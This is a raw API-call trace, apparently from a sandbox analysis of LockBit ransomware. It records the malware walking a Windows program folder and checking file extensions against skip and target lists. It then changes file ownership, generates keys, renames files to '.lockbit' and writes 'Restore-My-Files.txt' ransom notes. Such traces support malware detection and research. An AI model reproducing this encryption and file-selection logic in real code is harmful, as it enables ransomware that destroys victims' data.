lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0097.297] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.297] malloc (_Size=0xac) returned 0x77d800 [0097.298] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xac, FileInformationClass=0xa) returned 0x0 [0097.298] free (_Block=0x77d800) [0097.298] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0097.298] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0097.298] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.298] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="whiteband.png", cAlternateFileName="")) returned 0 [0097.299] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0097.299] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee53867, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee53867, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5caa, dwReserved0=0x520150, dwReserved1=0x0, cFileName="WhiteDot.png", cAlternateFileName="")) returned 1 [0097.299] lstrcmpiW (lpString1=".", lpString2="WhiteDot.png") returned -1 [0097.299] lstrcmpiW (lpString1="..", lpString2="WhiteDot.png") returned -1 [0097.299] PathFindExtensionW (pszPath="WhiteDot.png") returned=".png" [0097.299] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0097.299] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0097.299] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0097.299] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0097.299] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0097.299] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0097.299] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0097.299] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0097.299] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0097.299] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0097.300] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0097.300] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0097.300] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0097.300] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0097.300] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0097.300] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0097.301] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0097.301] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0097.301] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0097.301] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0097.301] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0097.301] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WhiteDot.png") returned -1 [0097.301] lstrcmpiW (lpString1="ntldr", lpString2="WhiteDot.png") returned -1 [0097.301] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WhiteDot.png") returned -1 [0097.301] lstrcmpiW (lpString1="bootsect.bak", lpString2="WhiteDot.png") returned -1 [0097.302] lstrcmpiW (lpString1="autorun.inf", lpString2="WhiteDot.png") returned -1 [0097.302] lstrcmpiW (lpString1="thumbs.db", lpString2="WhiteDot.png") returned -1 [0097.302] lstrcmpiW (lpString1="iconcache.db", lpString2="WhiteDot.png") returned -1 [0097.302] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0097.302] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png") returned=".png" [0097.302] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0097.302] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0097.302] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0097.302] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0097.303] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0097.303] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0097.303] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0097.303] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0097.303] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0097.303] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0097.303] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0097.303] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0097.303] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0097.303] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0097.303] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0097.303] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0097.303] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.lockbit") returned 65 [0097.303] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\whitedot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.305] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0097.307] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0097.307] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.308] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0097.310] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0097.310] RtlFreeAnsiString (AnsiString="\\") [0097.310] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b4) returned 0x0 [0097.310] malloc (_Size=0x200) returned 0x77d800 [0097.310] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0097.310] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0097.310] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0097.310] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0097.311] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0097.311] CloseHandle (hObject=0x3b4) returned 1 [0097.312] free (_Block=0x77d800) [0097.312] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\whitedot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0097.312] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.312] malloc (_Size=0x40068) returned 0x3d70048 [0097.314] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=23722) returned 1 [0097.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0097.318] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0097.321] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0097.332] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.332] malloc (_Size=0x98) returned 0x2073f40 [0097.332] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x98, FileInformationClass=0xa) returned 0x0 [0097.333] free (_Block=0x2073f40) [0097.333] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0097.333] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0097.333] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.335] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee53867, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee53867, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5caa, dwReserved0=0x520150, dwReserved1=0x0, cFileName="WhiteDot.png", cAlternateFileName="")) returned 0 [0097.335] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0097.335] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9060745b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x9060745b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x4877fc17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x379f, dwReserved0=0x523728, dwReserved1=0x0, cFileName="Filters.xml", cAlternateFileName="")) returned 1 [0097.335] lstrcmpiW (lpString1=".", lpString2="Filters.xml") returned -1 [0097.335] lstrcmpiW (lpString1="..", lpString2="Filters.xml") returned -1 [0097.335] PathFindExtensionW (pszPath="Filters.xml") returned=".xml" [0097.335] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0097.335] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0097.336] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0097.337] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Filters.xml") returned 1 [0097.338] lstrcmpiW (lpString1="ntldr", lpString2="Filters.xml") returned 1 [0097.338] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Filters.xml") returned 1 [0097.338] lstrcmpiW (lpString1="bootsect.bak", lpString2="Filters.xml") returned -1 [0097.338] lstrcmpiW (lpString1="autorun.inf", lpString2="Filters.xml") returned -1 [0097.338] lstrcmpiW (lpString1="thumbs.db", lpString2="Filters.xml") returned 1 [0097.338] lstrcmpiW (lpString1="iconcache.db", lpString2="Filters.xml") returned 1 [0097.338] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\") returned="" [0097.338] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\Filters.xml") returned=".xml" [0097.338] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0097.338] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0097.338] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0097.339] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0097.339] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\Filters.xml.lockbit") returned 54 [0097.339] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.341] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0097.342] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0097.342] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.344] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0097.345] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0097.345] RtlFreeAnsiString (AnsiString="\\") [0097.345] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6c530 | out: TokenHandle=0x3d6c530*=0x3a8) returned 0x0 [0097.345] malloc (_Size=0x200) returned 0x77d800 [0097.345] NtQueryInformationToken (in: TokenHandle=0x3a8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6c528 | out: TokenInformation=0x77d800, ReturnLength=0x3d6c528) returned 0x0 [0097.345] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6c2e4, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0097.346] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6c2e4, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0097.346] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Filters.xml", SecurityInformation=0x1, pSecurityDescriptor=0x3d6c2e4) returned 1 [0097.346] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Filters.xml", SecurityInformation=0x4, pSecurityDescriptor=0x3d6c2e4) returned 1 [0097.347] CloseHandle (hObject=0x3a8) returned 1 [0097.347] free (_Block=0x77d800) [0097.347] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a8 [0097.347] CreateIoCompletionPort (FileHandle=0x3a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.347] malloc (_Size=0x40068) returned 0x3e30078 [0097.350] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=14239) returned 1 [0097.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0097.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0097.416] ReadFile (in: hFile=0x3a8, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0097.418] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\Filters.xml.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.418] malloc (_Size=0x82) returned 0x1fa1360 [0097.418] NtSetInformationFile (FileHandle=0x3a8, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa1360, Length=0x82, FileInformationClass=0xa) returned 0x0 [0097.419] free (_Block=0x1fa1360) [0097.419] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\Filters.xml" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared") returned 1 [0097.419] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt") returned 55 [0097.419] CreateFileW (lpFileName="C:\\\\Program 